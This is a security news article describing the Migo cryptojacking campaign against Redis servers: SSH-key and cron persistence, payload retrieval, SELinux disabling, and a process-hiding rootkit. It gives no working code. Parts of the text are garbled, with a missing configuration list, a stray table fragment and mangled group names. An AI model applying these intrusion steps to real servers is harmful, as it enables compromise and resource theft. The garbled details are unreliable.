A new malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.
"This particular campaign involves the use of a number of novel techniques to weaken the system against the data store itself," said Matt Muir, security researcher at Cado. saying in a technical report.
The cryptojacking attack is facilitated by malware codenamed Migo, a Golang ELF binary that comes equipped with compile-time obfuscation and the ability to persist on Linux machines.
The cloud security company said it detected the campaign after identifying an "unusual series of commands" targeting its Redis honeypots that are designed to lower security defenses by disabling the following configuration options:
It is suspected that these options are disabled to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention.
This step is followed by threat actors setting up two Redis keys, one pointing to an SSH key controlled by the attacker and the other to a cron task that retrieves the malicious primary payload from a file transfer service called Transfer.sh. , A technique previously seen in early 2023.
The shell script to recover Migo using Transfer.sh is embedded within a Pastebin file which in turn is obtained using a curl or wget command.
 |
| Persistence |
The Go-based ELF binary, in addition to incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It is also responsible for performing a series of steps to establish persistence, remove competing miners, and launch the miner.
On top of that, Migo disables Linux with enhanced security (SELinux) and look for uninstall scripts for monitoring agents included in compute instances from cloud providers such as Qcloud and Alibaba Cloud. Additionally, it deploys a modified version ("libsystemd.so") of a popular user-mode rootkit called libprocesshider to hide processes and artifacts on disk.
It's worth noting that these actions overlap with tactics adopted by well-known cryptojacking groups like TeamTNT, Guard dog, Rockand threat actors associated with the SkidMap malware.
"Interestingly, Migo appears to recursively iterate through files and directories under /etc," Muir noted. "The malware will simply read the files in these locations and do nothing with the content."
"One theory is that this could be a (weak) attempt to confuse the sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification."
Another hypothesis is that the malware looks for a specific artifact from a target environment, although Cado said he found no evidence to support this line of reasoning.
"Migo demonstrates that cloud-focused attackers continue to refine their techniques and improve their ability to exploit web services," Muir said.
"Although libprocesshider is frequently used in cryptojacking campaigns, this particular variant includes the ability to hide artifacts on disk in addition to the malicious processes themselves."
